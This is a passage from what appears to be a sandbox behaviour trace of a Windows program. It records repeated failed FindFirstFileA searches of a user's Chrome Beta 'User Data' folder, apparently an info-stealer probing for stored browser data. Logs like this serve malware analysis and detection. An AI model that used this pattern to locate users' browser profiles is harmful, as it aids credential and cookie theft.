lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.714] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.714] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.715] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.715] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.716] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.716] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.717] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.717] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.718] wsprintfA (in: param_1=0x198474, 